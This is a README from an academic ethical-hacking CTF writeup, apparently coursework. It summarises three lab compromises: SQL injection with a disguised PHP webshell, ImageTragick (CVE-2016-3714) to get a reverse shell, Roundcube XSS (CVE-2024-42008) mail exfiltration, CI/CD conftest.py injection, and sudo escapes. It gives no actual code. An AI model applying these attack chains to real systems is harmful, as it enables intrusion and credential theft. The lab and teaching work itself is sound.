## https://sploitus.com/exploit?id=89FA941F-CED4-58DE-AA9E-1DF4276CA136
# ๐ Ethical Hacking CTF Writeup
### Coventry University โ 7072SCN Ethical Hacking and Penetration Testing
> A 3-box CTF assessment covering web exploitation, CVE research, CI/CD abuse, and privilege escalation. All flags captured.
---
## ๐ Overview
| Assessment | User Flag | Root Flag | Key Technique |
|------------|-----------|-----------|---------------|
| Web + SQLi + File Upload | โ | โ | SQL Injection + File Upload Bypass + sudo ftp |
| Blind SQLi + ImageTragick | โ | โ | Blind SQLi + CVE-2016-3714 + sudo convert |
| XSS + CI/CD + sudo git | โ | โ | CVE-2024-42008 XSS Email Exfiltration + CI/CD Injection + sudo git |
---
## ๐ง Skills Demonstrated
- **Web Exploitation** โ SQL injection, XSS, file upload bypass, MIME type manipulation
- **CVE Research & Exploitation** โ CVE-2024-42008 (Roundcube XSS), CVE-2016-3714 (ImageTragick)
- **Network Reconnaissance** โ nmap, Gobuster, virtual host enumeration
- **Privilege Escalation** โ sudo misconfigurations, SUID binaries, GTFOBins
- **CI/CD Exploitation** โ pytest conftest.py injection, git hook abuse
- **Scripting** โ Custom Python exploit development (smtplib, HTTP listener)
- **Proxy/Interception** โ Burp Suite request manipulation
---
## ๐ ๏ธ Tools Used
| Tool | Purpose |
|------|---------|
| nmap | Port scanning and service enumeration |
| Gobuster | Directory and virtual host discovery |
| Burp Suite | HTTP request interception and manipulation |
| Python 3 | Custom exploit scripting |
| Netcat | Listeners and shell handling |
| GTFOBins | Sudo escape techniques |
| SSH | Remote access |
| curl | API interaction and webhook triggering |
---
## ๐ Structure
```
ethical-hacking-ctf/
โโโ README.md โ You are here
โโโ report.docx โ Full penetration test report
โโโ sqli-file-upload/
โ โโโ writeup.md โ SQLi + file upload methodology
โโโ xss-cicd-privesc/
โโโ writeup.md โ Full XSS + CI/CD + privesc writeup
โโโ xss_payload.py โ CVE-2024-42008 exploit script
โโโ conftest.py โ CI/CD injection payload
โโโ pre-commit โ Git hook payload
```
---
## ๐ฏ Assessment Summaries
### SQLi + File Upload
Enumerated a PHP web application using nmap and Gobuster. Identified SQL injection on the login page and bypassed authentication. Uploaded a PHP webshell disguised as a JPEG using Burp Suite to intercept and manipulate the MIME type. Renamed the file via the admin panel and achieved RCE. Escalated to root via a `sudo ftp` escape using GTFOBins.
### Blind SQLi + ImageTragick (CVE-2016-3714)
Exploited boolean-based blind SQL injection to extract credentials from the database. Cracked the MD5 hash and reused credentials over SSH to get the user flag. Exploited CVE-2016-3714 (ImageTragick) via the avatar upload function to get a reverse shell as www-data. Escalated to root using `sudo convert` with URL injection.
### XSS Email Exfiltration + CI/CD Injection (CVE-2024-42008)
See [`xss-cicd-privesc/writeup.md`](xss-cicd-privesc/writeup.md) for the full walkthrough.
**TL;DR:** Exploited CVE-2024-42008 XSS in Roundcube Webmail 1.6.6 to silently exfiltrate the webmaster's inbox and steal SSH credentials. Escalated from webmaster โ admin by injecting a malicious pytest conftest.py into the CI/CD pipeline via a world-writable /tmp directory. Escalated from admin โ root by abusing a NOPASSWD sudo rule for `git commit`, using a malicious pre-commit hook to read the root flag.
---
## ๐ Report
The full penetration test report (including reconnaissance, risk ratings using CVSS v3.1, exploit methodology, and mitigations) is available as [`report.docx`](report.docx).
---
## โ ๏ธ Disclaimer
This assessment was conducted in an authorised academic lab environment as part of Coventry University coursework. All techniques were used only within the designated lab. Do not use these techniques on systems you do not own or have explicit permission to test.
---
*MSc Ethical Hacking and Penetration Testing โ Coventry University, 2026*